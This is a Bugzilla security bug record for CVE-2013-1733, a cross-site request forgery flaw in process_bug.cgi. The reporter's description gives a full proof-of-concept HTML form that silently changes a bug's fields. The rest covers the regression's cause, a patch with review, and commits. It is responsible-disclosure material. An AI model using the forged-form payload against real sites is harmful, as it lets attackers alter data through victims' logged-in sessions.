Last Comment Bug 911593 - (CVE-2013-1733) [SECURITY] CSRF in process_bug.cgi
(CVE-2013-1733)
: [SECURITY] CSRF in process_bug.cgi
Status: RESOLVED FIXED
: regression, sec-critical, wsec-csrf
Product: Bugzilla
Classification: Server Software
Component: Creating/Changing Bugs (show other bugs)
: 4.4
: All All
: -- major (vote)
: Bugzilla 4.4
Assigned To: Frédéric Buclin
: default-qa
Mentors:
https://landfill.bugzilla.org/bugzill...
Depends on: 69447
Blocks: 912643 912661
  Show dependency treegraph
 
Reported: 2013-09-01 12:50 PDT by Mateusz Goik
Modified: 2014-07-24 16:54 PDT (History)
4 users (show)
mail: approval+
mail: approval4.4+
LpSolit: blocking4.4.1+
abillings: sec‑bounty+
See Also:
QA Whiteboard:
Iteration: ---
Points: ---


Attachments
patch, v1 (2.41 KB, patch)
2013-09-01 15:40 PDT, Frédéric Buclin
dkl: review+
Details | Diff | Review

Description Mateusz Goik 2013-09-01 12:50:44 PDT
PoC: (Changes in the bug with ID 21951 - landfill.bugzilla.org)

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/process_bug.cgi" method="POST">
      <input type="hidden" name="delta&#95;ts" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="longdesclength" value="1" />
      <input type="hidden" name="id" value="21951" />
      <input type="hidden" name="token" value="aaaaaaaaaaaaaaaaaaaaa" />
      <input type="hidden" name="alias" value="aaaaaaaaa" />
      <input type="hidden" name="short&#95;desc" value="TEST2" />
      <input type="hidden" name="product" value="FoodReplicator" />
      <input type="hidden" name="classification" value="Unclassified" />
      <input type="hidden" name="component" value="renamed&#32;component" />
      <input type="hidden" name="rep&#95;platform" value="PC" />
      <input type="hidden" name="op&#95;sys" value="Linux" />
      <input type="hidden" name="priority" value="P2" />
      <input type="hidden" name="bug&#95;severity" value="normal" />
      <input type="hidden" name="target&#95;milestone" value="&#45;&#45;&#45;" />
      <input type="hidden" name="assigned&#95;to" value="mybutt&#64;inyourface&#46;com" />
      <input type="hidden" name="qa&#95;contact" value="" />
      <input type="hidden" name="bug&#95;file&#95;loc" value="" />
      <input type="hidden" name="status&#95;whiteboard" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="tag" value="" />
      <input type="hidden" name="dependson" value="" />
      <input type="hidden" name="blocked" value="" />
      <input type="hidden" name="newcc" value="" />
      <input type="hidden" name="defined&#95;bug&#95;ignored" value="1" />
      <input type="hidden" name="see&#95;also" value="" />
      <input type="hidden" name="cf&#95;large&#95;text" value="" />
      <input type="hidden" name="cf&#95;free&#95;text" value="" />
      <input type="hidden" name="defined&#95;cf&#95;mulitple&#95;select" value="" />
      <input type="hidden" name="cf&#95;drop&#95;down" value="&#45;&#45;&#45;" />
      <input type="hidden" name="cf&#95;date" value="" />
      <input type="hidden" name="cf&#95;bug&#95;id" value="" />
      <input type="hidden" name="flag&#95;type&#45;8" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;8" value="" />
      <input type="hidden" name="flag&#95;type&#45;9" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;9" value="" />
      <input type="hidden" name="flag&#95;type&#45;11" value="X" />
      <input type="hidden" name="flag&#95;type&#45;5" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;5" value="" />
      <input type="hidden" name="flag&#95;type&#45;10" value="X" />
      <input type="hidden" name="flag&#95;type&#45;6" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;6" value="" />
      <input type="hidden" name="flag&#95;type&#45;12" value="X" />
      <input type="hidden" name="estimated&#95;time" value="0&#46;0" />
      <input type="hidden" name="work&#95;time" value="0" />
      <input type="hidden" name="remaining&#95;time" value="0&#46;0" />
      <input type="hidden" name="deadline" value="" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="bug&#95;status" value="CONFIRMED" />
      <input type="hidden" name="resolution" value="FIXED" />
      <input type="hidden" name="dup&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Comment 1 Frédéric Buclin 2013-09-01 14:13:30 PDT
Confirmed! This is a regression due to bug 69447 which generates a new valid token without first making sure that the midair collision page will be displayed. This bug only affects 4.4 and newer. 4.3.3 and older are not affected.
Comment 2 Frédéric Buclin 2013-09-01 14:23:08 PDT
I'm on it. Easy to fix.
Comment 3 Frédéric Buclin 2013-09-01 15:40:10 PDT
Created attachment 798337 [details] [diff] [review]
patch, v1

The new token must only be generated when we are going to display the midair collision page. Also, I had to validate delta_ts, else it was possible to crash PostgreSQL if you passed an invalid one.
Comment 4 Daniel Veditz [:dveditz] 2013-09-04 12:27:29 PDT
Assigning CVE-2013-1733 to this vulnerability.
Comment 5 David Lawrence [:dkl] 2013-09-04 13:20:36 PDT
Comment on attachment 798337 [details] [diff] [review]
patch, v1

Review of attachment 798337 [details] [diff] [review]:
-----------------------------------------------------------------

Looks fine and fixes the issue for me. r=dkl

::: process_bug.cgi
@@ +114,5 @@
> +my $delta_ts = $cgi->param('delta_ts');
> +
> +if ($delta_ts) {
> +    my $delta_ts_z = datetime_from($delta_ts)
> +      or ThrowCodeError('invalid_timestamp', { timestamp => $delta_ts });

nit: 4 space indentation

@@ +124,3 @@
>  
> +        my $start_at = $cgi->param('longdesclength')
> +          or ThrowCodeError('undefined_field', { field => 'longdesclength' });

same nit
Comment 6 Frédéric Buclin 2013-09-04 13:23:41 PDT
(In reply to David Lawrence [:dkl] from comment #5)
> nit: 4 space indentation

Not when splitting long lines. ;)
Comment 7 mail 2013-09-05 18:43:57 PDT
Will be patched on bugzilla.redhat.com at 4am UTC (just over two hours from now)
Comment 8 Daniel Veditz [:dveditz] 2013-09-30 15:22:28 PDT
Dave: does this affect BMO? iirc we're on 4.2 plus backported goodies and may or may not suffer from this.
Comment 9 Frédéric Buclin 2013-09-30 15:24:07 PDT
(In reply to Daniel Veditz [:dveditz] from comment #8)
> Dave: does this affect BMO?

Yes, see bug 912661.
Comment 10 Frédéric Buclin 2013-10-16 10:00:00 PDT
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified process_bug.cgi
Committed revision 8777.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified process_bug.cgi
Committed revision 8623.
Comment 11 Frédéric Buclin 2013-10-17 07:58:56 PDT
Security advisory sent.

Note You need to log in before you can comment on or make changes to this bug.